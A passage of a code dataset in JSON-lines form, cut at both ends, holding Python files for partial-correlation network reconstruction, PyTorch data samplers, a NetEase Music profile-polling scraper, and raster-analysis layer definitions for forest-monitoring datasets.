"usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 163, "usage_type": "call"}, {"api_name": "geektime_dl.data_client.DataClient", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "476035165", "text": "\"\"\"\npartial_correlation_influence.py\n--------------------------------\n\nReconstruction of graphs using the partial correlation influence, as defined in:\n\nKenett, D. Y. et al. Dominating clasp of the financial sector revealed by\npartial correlation analysis of the stock market. PLoS ONE 5, e15032 (2010).\n\nThe index variable option as in:\n\nKenett, D. Y., Huang, X., Vodenska, I., Havlin, S. & Stanley, H. E. Partial correlation\nanalysis: applications for financial markets. Quantitative Finance 15, 569–578 (2015).\n\n\nauthor: Carolina Mattsson\nemail: mattsson dot c at northeastern dot edu\nSubmitted as part of the 2019 NetSI Collabathon\n\"\"\"\nfrom .base import BaseReconstructor\nimport numpy as np\nimport networkx as nx\nfrom scipy import stats, linalg\nfrom ..utilities import create_graph, threshold\n\n\nclass PartialCorrelationInfluence(BaseReconstructor):\n \"\"\"Uses average effect from a sensor to all others.\"\"\"\n\n def fit(self, TS, index=None, threshold_type='range', **kwargs):\n r\"\"\"Uses the average effect of a series :math:`Z` on the correlation between\n a series :math:`X` and all other series.\n\n The partial correlation influence:\n\n .. math::\n\n d(X:Z) = _Y \\neq X,\n\n where :math:`d(X,Y:Z) = \\rho(X,Y) - \\rho(X,Y:Z)`\n\n\n If an index is given, both terms become partial correlations:\n\n .. math::\n\n d(X,Y:Z) ≡ ρ(X,Y:M) − ρ(X,Y:M,Z)\n\n\n The results dictionary also stores the matrix of partial\n correlations as `'weights_matrix'` and the thresholded version of\n the partial correlation matrix as `'thresholded_matrix'`.\n\n Parameters\n ----------\n\n index (int, array of ints, or None)\n Take the partial correlations of each pair of elements holding\n constant an index variable or set of index variables. 
If None,\n take the partial correlations of the variables holding constant\n all other variables.\n\n threshold_type (str):\n Which thresholding function to use on the matrix of\n weights. See `netrd.utilities.threshold.py` for\n documentation. Pass additional arguments to the thresholder\n using ``**kwargs``.\n\n Returns\n -------\n\n G (nx.Graph)\n a reconstructed graph.\n\n References\n -----------\n\n .. [1] Kenett, D. Y. et al. Dominating clasp of the financial\n sector revealed by partial correlation analysis of the stock\n market. PLoS ONE 5, e15032 (2010).\n\n .. [2] Kenett, D. Y., Huang, X., Vodenska, I., Havlin, S. &\n Stanley, H. E. Partial correlation analysis: applications\n for financial markets. Quantitative Finance 15, 569–578\n (2015).\n\n \"\"\"\n if index:\n p_cor = partial_corr(TS, index=index)\n n_TS = p_cor.shape[0]\n p_cor = np.delete(p_cor, index, axis=0)\n p_cor = np.delete(p_cor, index, axis=1)\n else:\n p_cor = partial_corr(TS)\n\n np.fill_diagonal(p_cor, float(\"nan\"))\n\n n = p_cor.shape[0]\n\n p_cor_zs = np.zeros((n, n, n))\n\n if index:\n for k, z in enumerate(np.delete(range(n_TS), index)):\n index_z = np.append(index, z)\n p_cor_z = partial_corr(TS, index=index_z)\n p_cor_z = np.delete(p_cor_z, index, axis=0)\n p_cor_z = np.delete(p_cor_z, index, axis=1)\n p_cor_z = p_cor - p_cor_z\n p_cor_z[:, k] = float(\"nan\")\n p_cor_z[k, :] = -np.inf\n p_cor_zs[z] = p_cor_z\n else:\n index = np.array([], dtype=int)\n for z in range(n):\n index_z = z\n p_cor_z = partial_corr(TS, index=index_z)\n p_cor_z = p_cor - p_cor_z\n p_cor_z[:, z] = float(\"nan\")\n p_cor_z[z, :] = -np.inf\n p_cor_zs[z] = p_cor_z\n\n p_cor_inf = np.nanmean(p_cor_zs, axis=2) # mean over the Y axis\n\n self.results['weights_matrix'] = p_cor_inf\n\n # threshold the network\n W_thresh = threshold(p_cor_inf, threshold_type, **kwargs)\n\n # construct the network\n self.results['graph'] = create_graph(W_thresh)\n self.results['thresholded_matrix'] = W_thresh\n\n G = self.results['graph']\n\n return G\n\n\n# This partial correlation function is adapted from Fabian Pedregosa-Izquierdo's\n# implementation of partial correlation in Python, found at [this gist](\n# https://gist.github.com/fabianp/9396204419c7b638d38f)\n\"\"\"\nPartial Correlation in Python (clone of Matlab's partialcorr)\n\nThis uses the linear regression approach to compute the partial\ncorrelation (might be slow for a huge number of variables). 
The\nalgorithm is detailed here:\n\n http://en.wikipedia.org/wiki/Partial_correlation#Using_linear_regression\n\nTaking X and Y two variables of interest and Z the matrix with all the variable minus {X, Y},\nthe algorithm can be summarized as\n\n 1) perform a normal linear least-squares regression with X as the target and Z as the predictor\n 2) calculate the residuals in Step #1\n 3) perform a normal linear least-squares regression with Y as the target and Z as the predictor\n 4) calculate the residuals in Step #3\n 5) calculate the correlation coefficient between the residuals from Steps #2 and #4;\n\n The result is the partial correlation between X and Y while controlling for the effect of Z\n\n\nDate: Nov 2014\nAuthor: Fabian Pedregosa-Izquierdo, f@bianp.net\nTesting: Valentina Borghesani, valentinaborghesani@gmail.com\n\"\"\"\n\n\ndef partial_corr(C, index=None):\n \"\"\"Returns the sample linear partial correlation coefficients between pairs of\n variables in C, controlling for the remaining variables in C.\n\n\n Parameters\n ----------\n C : array-like, shape (p, n)\n Array with the different variables. Each row of C is taken as a variable\n\n\n Returns -------\n P : array-like, shape (p, p)\n P[i, j] contains the partial correlation of C[:, i] and C[:, j]\n controlling for the remaining variables in C.\n\n \"\"\"\n\n C = np.asarray(C).T\n p = C.shape[1]\n P_corr = np.zeros((p, p), dtype=np.float)\n\n for i in range(p):\n P_corr[i, i] = 1\n for j in range(i + 1, p):\n if index is None:\n idx = np.ones(p, dtype=np.bool)\n idx[i] = False\n idx[j] = False\n elif type(index) is int or (\n isinstance(index, np.ndarray)\n and issubclass(index.dtype.type, np.integer)\n ):\n idx = np.zeros(p, dtype=np.bool)\n idx[index] = True\n else:\n raise ValueError(\n \"Index must be an integer, an array of \" \"integers, or None.\"\n )\n\n beta_i = linalg.lstsq(C[:, idx], C[:, j])[0]\n beta_j = linalg.lstsq(C[:, idx], C[:, i])[0]\n\n res_j = C[:, j] - C[:, idx].dot(beta_i)\n res_i = C[:, i] - C[:, idx].dot(beta_j)\n\n corr = stats.pearsonr(res_i, res_j)[0]\n P_corr[i, j] = corr\n P_corr[j, i] = corr\n\n return P_corr\n", "sub_path": "netrd/reconstruction/partial_correlation_influence.py", "file_name": "partial_correlation_influence.py", "file_ext": "py", "file_size_in_byte": 7248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.BaseReconstructor", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 122, "usage_type": "call"}, {"api_name": "utilities.threshold", "line_number": 127, "usage_type": "call"}, {"api_name": "utilities.create_graph", "line_number": 130, "usage_type": "call"}, {"api_name": 
"numpy.asarray", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 188, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.integer", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 201, "usage_type": "attribute"}, {"api_name": "scipy.linalg.lstsq", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 208, "usage_type": "name"}, {"api_name": "scipy.linalg.lstsq", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 209, "usage_type": "name"}, {"api_name": "scipy.stats.pearsonr", "line_number": 214, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 214, "usage_type": "name"}]} +{"seq_id": "75915223", "text": "import torch\r\nfrom torch.utils.data.sampler import Sampler\r\nimport numpy as np\r\nimport logging\r\n\r\ndef create_logger(name, log_file, level=logging.INFO):\r\n l = logging.getLogger(name)\r\n formatter = logging.Formatter('[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\r\n fh = logging.FileHandler(log_file)\r\n fh.setFormatter(formatter)\r\n sh = logging.StreamHandler()\r\n sh.setFormatter(formatter)\r\n l.setLevel(level)\r\n l.addHandler(fh)\r\n l.addHandler(sh)\r\n return l\r\n\r\nclass DataSampler(Sampler):\r\n \"\"\"Sampler that restricts data loading to a subset of the dataset.\r\n\r\n .. note::\r\n Dataset is assumed to be of constant size.\r\n\r\n Arguments:\r\n dataset: Dataset used for sampling.\r\n \"\"\"\r\n\r\n def __init__(self, dataset, round_up=True):\r\n self.dataset = dataset\r\n self.round_up = round_up\r\n self.epoch = 0\r\n \r\n self.num_samples = len(self.dataset)\r\n\r\n self.total_size = len(self.dataset)\r\n\r\n def __iter__(self):\r\n # deterministically shuffle based on epoch\r\n g = torch.Generator()\r\n g.manual_seed(self.epoch)\r\n indices = list(torch.randperm(len(self.dataset), generator=g))\r\n\r\n # add extra samples to make it evenly divisible\r\n if self.round_up:\r\n indices += indices[:(self.total_size - len(indices))]\r\n assert len(indices) == self.total_size\r\n\r\n return iter(indices)\r\n\r\n def __len__(self):\r\n return self.num_samples\r\n\r\n def set_epoch(self, epoch):\r\n self.epoch = epoch\r\n\r\nclass GivenIterationSampler(Sampler):\r\n def __init__(self, dataset, total_iter, batch_size, last_iter=-1):\r\n self.dataset = dataset\r\n self.total_iter = total_iter\r\n self.batch_size = batch_size\r\n self.world_size = 1\r\n self.rank = 0\r\n self.last_iter = last_iter\r\n\r\n self.total_size = self.total_iter*self.batch_size\r\n\r\n self.indices = self.gen_new_list()\r\n self.call = 0\r\n\r\n def __iter__(self):\r\n if self.call == 0:\r\n self.call = 1\r\n return iter(self.indices[(self.last_iter+1)*self.batch_size:])\r\n else:\r\n raise RuntimeError(\"this sampler is not designed to be called more than once!!\")\r\n\r\n def gen_new_list(self):\r\n\r\n # each process shuffle all list with same seed, and pick one piece according to rank\r\n np.random.seed(0)\r\n\r\n all_size = self.total_size * self.world_size\r\n indices = np.arange(len(self.dataset))\r\n indices = indices[:all_size]\r\n 
num_repeat = (all_size-1) // indices.shape[0] + 1\r\n indices = np.tile(indices, num_repeat)\r\n indices = indices[:all_size]\r\n\r\n np.random.shuffle(indices)\r\n beg = self.total_size * self.rank\r\n indices = indices[beg:beg+self.total_size]\r\n\r\n assert len(indices) == self.total_size\r\n\r\n return indices\r\n\r\n def __len__(self):\r\n # note here we do not take last iter into consideration, since __len__\r\n # should only be used for displaying, the correct remaining size is\r\n # handled by dataloader\r\n #return self.total_size - (self.last_iter+1)*self.batch_size\r\n return self.total_size", "sub_path": "util/data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 3252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Generator", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "90687184", "text": "import requests\nfrom lxml import etree\nimport re\nimport datetime\nimport time\n\nurl='https://music.163.com/user/home?id=514172523'\nheaders={\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n}\n\n\ndef get_username_sign(result):\n sign=re.split('[。,;:]',result[0])[0]\n username=re.sub('[的最近常听]','',re.split('[、]',re.split('[。,;:]',result[0])[1])[0])\n return username,sign\n\n\ndef write_if_not_exist(username,sign):\n '''判断是否相同,如果有不同的就写入'''\n with open('163music.txt','r',encoding='utf-8') as f:\n for line in f:\n result=username+'\\t'+sign+'\\n'\n if result in line:\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'已经存在\\t'+result)\n f.close()\n return\n else:\n with open('163music.txt','a',encoding='utf-8') as f:\n f.write(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'\\t'+username+'\\t'+sign+'\\n')\n f.close()\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'写入成功\\t'+result)\n\nwhile 1:\n r=requests.get(url,headers=headers)\n html=etree.HTML(r.text)\n result=html.xpath('//meta[@name=\"description\"]/@content')\n username,sign=get_username_sign(result)\n write_if_not_exist(username,sign)\n time.sleep(60)\n \n", "sub_path": "pycrawler/163music.py", "file_name": "163music.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.split", "line_number": 14, "usage_type": 
"call"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "re.split", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 36, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "324311191", "text": "from collections import defaultdict\nfrom datetime import date, datetime, timedelta\nfrom typing import Any, Dict, List\n\nfrom pandas import Series\n\nfrom raster_analysis.globals import CO2_FACTOR\nfrom raster_analysis.layer import Grid, Layer\n\n\ndef date_conf_decoder(layer: str, s: Series) -> Dict[str, Series]:\n days_since_2015 = s % 10000\n ordinal_dates = days_since_2015 + date(2014, 12, 31).toordinal()\n str_dates = ordinal_dates.apply(\n lambda val: date.fromordinal(val).strftime(\"%Y-%m-%d\")\n )\n\n return {layer: str_dates}\n\n\ndef date_conf_encoder(val: Any) -> List[Any]:\n as_date = datetime.strptime(val, \"%Y-%m-%d\")\n days_since_2015 = as_date.toordinal() - date(2014, 12, 31).toordinal()\n return [days_since_2015]\n\n\ndef date_conf_isoweek_decoder(layer: str, s: Series):\n days_since_2015 = s % 10000\n ordinal_dates = days_since_2015 + date(2014, 12, 31).toordinal()\n dates = [date.fromordinal(ordinal) for ordinal in ordinal_dates]\n iso_week_dates = [(d - timedelta(days=d.isoweekday() - 1)) for d in dates]\n\n iso_weeks = list(map(lambda val: val.isocalendar()[1], iso_week_dates))\n years = list(map(lambda val: val.isocalendar()[0], iso_week_dates))\n\n base_name = layer.split(\"__\")[0]\n\n if base_name == \"umd_glad_landsat_alerts\":\n base_name = \"umd_glad_alerts\"\n\n return {f\"{base_name}__isoweek\": iso_weeks, f\"{base_name}__year\": years}\n\n\ndef year_decoder(layer, s):\n return {layer: s + 2000}\n\n\ndef year_encoder(val):\n return [val - 2000]\n\n\ndef co2_decoder(layer, s):\n return {\"whrc_aboveground_co2_emissions__Mg\": s * CO2_FACTOR}\n\n\n# TODO refactor this when you start consuming from data API, using a dict here gets messy\nLAYERS: Dict[str, Layer] = defaultdict(\n lambda: Layer(layer=\"count\", version=\"virtual\"),\n {\n \"area__ha\": Layer(layer=\"area__ha\", version=\"virtual\"),\n \"alert__count\": Layer(layer=\"alert__count\", version=\"virtual\"),\n \"latitude\": Layer(layer=\"latitude\", version=\"virtual\"),\n \"longitude\": Layer(layer=\"longitude\", version=\"virtual\"),\n \"umd_tree_cover_loss__year\": Layer(\n layer=\"umd_tree_cover_loss__year\",\n version=\"v1.8\",\n decoder=year_decoder,\n encoder=year_encoder,\n ),\n # deprecated\n \"umd_glad_alerts__date\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n ),\n # deprecated\n \"umd_glad_alerts__isoweek\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_isoweek_decoder,\n ),\n \"umd_glad_landsat_alerts__date\": Layer(\n 
layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n is_conf_encoded=True,\n ),\n \"umd_glad_landsat_alerts__isoweek\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_isoweek_decoder,\n ),\n \"umd_glad_landsat_alerts__confidence\": Layer.from_encoding(\n \"umd_glad_landsat_alerts__date\",\n \"v1.7\",\n encoding={2: \"\", 3: \"high\"},\n alias=\"umd_glad_landsat_alerts__confidence\",\n ),\n \"gfw_radd_alerts__date\": Layer(\n layer=\"gfw_radd_alerts__date_conf\",\n alias=\"gfw_radd_alerts__date\",\n version=\"v20210328\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n ),\n \"gfw_radd_alerts__confidence\": Layer.from_encoding(\n \"gfw_radd_alerts__date_conf\",\n \"v20210328\",\n encoding={2: \"\", 3: \"high\"},\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n alias=\"gfw_radd_alerts__confidence\",\n ),\n \"umd_glad_sentinel2_alerts__date\": Layer(\n layer=\"umd_glad_sentinel2_alerts__date_conf\",\n alias=\"umd_glad_sentinel2_alerts__date\",\n version=\"v20210406\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n ),\n \"umd_glad_sentinel2_alerts__confidence\": Layer.from_encoding(\n \"umd_glad_sentinel2_alerts__date_conf\",\n \"v20210406\",\n encoding={2: \"\", 3: \"high\"},\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n alias=\"umd_glad_sentinel2_alerts__confidence\",\n ),\n \"is__umd_regional_primary_forest_2001\": Layer.boolean(\n \"is__umd_regional_primary_forest_2001\", \"v201901\"\n ),\n \"umd_tree_cover_density_2000__threshold\": Layer.from_encoding(\n \"umd_tree_cover_density_2000__threshold\",\n \"v1.6\",\n encoding={1: 10, 2: 15, 3: 20, 4: 25, 5: 30, 6: 50, 7: 75},\n ),\n \"umd_tree_cover_density_2010__threshold\": Layer.from_encoding(\n \"umd_tree_cover_density_2010__threshold\",\n \"v1.6\",\n encoding={1: 10, 2: 15, 3: 20, 4: 25, 5: 30, 6: 50, 7: 75},\n ),\n \"is__umd_tree_cover_gain\": Layer.boolean(\"is__umd_tree_cover_gain\", \"v1.6\"),\n \"whrc_aboveground_biomass_stock_2000__Mg_ha-1\": Layer(\n layer=\"whrc_aboveground_biomass_stock_2000__Mg_ha-1\",\n version=\"v4\",\n is_area_density=True,\n ),\n \"whrc_aboveground_co2_emissions__Mg\": Layer(\n layer=\"whrc_aboveground_biomass_stock_2000__Mg_ha-1\",\n version=\"v4\",\n is_area_density=True,\n decoder=co2_decoder,\n ),\n \"tsc_tree_cover_loss_drivers__type\": Layer.from_encoding(\n \"tsc_tree_cover_loss_drivers__type\",\n \"v2020\",\n encoding=defaultdict(\n lambda: \"Unknown\",\n {\n 1: \"Commodity driven deforestation\",\n 2: \"Shifting agriculture\",\n 3: \"Forestry\",\n 4: \"Wildfire\",\n 5: \"Urbanization\",\n },\n ),\n ),\n \"gfw_plantations__type\": Layer.from_encoding(\n \"gfw_plantations__type\",\n \"v1.3\",\n encoding={\n 1: \"Fruit\",\n 2: \"Fruit Mix\",\n 3: \"Oil Palm \",\n 4: \"Oil Palm Mix\",\n 5: \"Other\",\n 6: \"Rubber\",\n 7: \"Rubber Mix\",\n 8: \"Unknown\",\n 9: \"Unknown Mix\",\n 10: \"Wood fiber / Timber\",\n 11: \"Wood fiber / Timber Mix\",\n },\n ),\n \"wdpa_protected_areas__iucn_cat\": Layer.from_encoding(\n \"wdpa_protected_areas__iucn_cat\",\n \"v202007\",\n encoding={1: \"Category Ia/b or II\", 2: \"Other Category\"},\n ),\n \"esa_land_cover_2015__class\": Layer.from_encoding(\n \"esa_land_cover_2015__class\",\n \"v20160111\",\n encoding=defaultdict(\n lambda: \"Unknown\",\n {\n 10: \"Agriculture\",\n 11: \"Agriculture\",\n 
12: \"Agriculture\",\n 20: \"Agriculture\",\n 30: \"Agriculture\",\n 40: \"Agriculture\",\n 50: \"Forest\",\n 60: \"Forest\",\n 61: \"Forest\",\n 62: \"Forest\",\n 70: \"Forest\",\n 72: \"Forest\",\n 80: \"Forest\",\n 81: \"Forest\",\n 82: \"Forest\",\n 90: \"Forest\",\n 100: \"Forest\",\n 160: \"Forest\",\n 170: \"Forest\",\n 110: \"Grassland\",\n 130: \"Grassland\",\n 180: \"Wetland\",\n 190: \"Settlement\",\n 120: \"Shrubland\",\n 121: \"Shrubland\",\n 122: \"Shrubland\",\n 140: \"Sparse vegetation\",\n 150: \"Sparse vegetation\",\n 151: \"Sparse vegetation\",\n 152: \"Sparse vegetation\",\n 153: \"Sparse vegetation\",\n 200: \"Bare\",\n 201: \"Bare\",\n 202: \"Bare\",\n 210: \"Water\",\n 220: \"Permanent snow and ice\",\n },\n ),\n ),\n \"is__birdlife_alliance_for_zero_extinction_sites\": Layer.boolean(\n \"is__birdlife_alliance_for_zero_extinction_sites\", \"v20200725\"\n ),\n \"is__gmw_mangroves_1996\": Layer.boolean(\"is__gmw_mangroves_1996\", \"v20180701\"),\n \"is__gmw_mangroves_2016\": Layer.boolean(\"is__gmw_mangroves_2016\", \"v20180701\"),\n \"ifl_intact_forest_landscapes__year\": Layer(\n layer=\"ifl_intact_forest_landscapes__year\", version=\"v20180628\"\n ),\n \"is__gfw_tiger_landscapes\": Layer.boolean(\n \"is__gfw_tiger_landscapes\", \"v201904\"\n ),\n \"is__landmark_land_rights\": Layer.boolean(\n \"is__landmark_land_rights\", \"v20191111\"\n ),\n \"is__gfw_land_rights\": Layer.boolean(\"is__gfw_land_rights\", \"v2016\"),\n \"is__birdlife_key_biodiversity_areas\": Layer.boolean(\n \"is__birdlife_key_biodiversity_areas\", \"v20191211\"\n ),\n \"is__gfw_mining\": Layer.boolean(\"is__gfw_mining\", \"v20190205\"),\n \"is__gfw_peatlands\": Layer.boolean(\"is__gfw_peatlands\", \"v20190103\"),\n \"is__gfw_oil_palm\": Layer.boolean(\"is__gfw_oil_palm\", \"v20191031\"),\n \"is__gfw_wood_fiber\": Layer.boolean(\"is__gfw_wood_fiber\", \"v20200725\"),\n \"is__gfw_resource_rights\": Layer.boolean(\"is__gfw_resource_rights\", \"v2015\"),\n \"is__gfw_managed_forests\": Layer.boolean(\n \"is__gfw_managed_forests\", \"v20190103\"\n ),\n \"rspo_oil_palm__certification_status\": Layer(\n layer=\"rspo_oil_palm__certification_status\",\n version=\"v20200114\",\n encoding={1: \"Certified\", 2: \"Unknown\", 3: \"Not certified\"},\n ),\n \"idn_forest_area__type\": Layer.from_encoding(\n \"idn_forest_area__type\",\n \"v201709\",\n encoding={\n 1001: \"Protected Forest\",\n 1003: \"Production Forest\",\n 1004: \"Limited Production Forest\",\n 1005: \"Converted Production Forest\",\n 1007: \"Other Utilization Area\",\n 1: \"Sanctuary Reserves/Nature Conservation Area\",\n 1002: \"Sanctuary Reserves/Nature Conservation Area\",\n 10021: \"Sanctuary Reserves/Nature Conservation Area\",\n 10022: \"Sanctuary Reserves/Nature Conservation Area\",\n 10023: \"Sanctuary Reserves/Nature Conservation Area\",\n 10024: \"Sanctuary Reserves/Nature Conservation Area\",\n 10025: \"Sanctuary Reserves/Nature Conservation Area\",\n 10026: \"Sanctuary Reserves/Nature Conservation Area\",\n 100201: \"Marine Protected Areas\",\n 100211: \"Marine Protected Areas\",\n 100221: \"Marine Protected Areas\",\n 100201: \"Marine Protected Areas\",\n 100201: \"Marine Protected Areas\",\n },\n ),\n \"per_forest_concession__type\": Layer.from_encoding(\n \"per_forest_concession__type\",\n \"v20161001\",\n encoding={\n 1: \"Conservation\",\n 2: \"Ecotourism\",\n 3: \"Nontimber Forest Products (Nuts)\",\n 4: \"Nontimber Forest Products (Shiringa)\",\n 5: \"Reforestation\",\n 6: \"Timber Concession\",\n 7: \"Wildlife\",\n },\n ),\n 
\"bra_biome__name\": Layer.from_encoding(\n \"bra_biome__name\",\n \"v20150601\",\n encoding={\n 1: \"Caatinga\",\n 2: \"Cerrado\",\n 3: \"Pantanal\",\n 4: \"Pampa\",\n 5: \"Amazônia\",\n 6: \"Mata Atlântica\",\n },\n ),\n },\n)\n", "sub_path": "raster_analysis/data_lake.py", "file_name": "data_lake.py", "file_ext": "py", "file_size_in_byte": 12277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.date.fromordinal", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 21, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.date.fromordinal", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}, {"api_name": "raster_analysis.globals.CO2_FACTOR", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 57, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 57, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 58, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 60, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 61, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 62, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 63, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 64, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 71, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 78, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 83, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 90, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 95, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 95, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 101, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 107, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 109, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 109, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 113, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 116, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 122, 
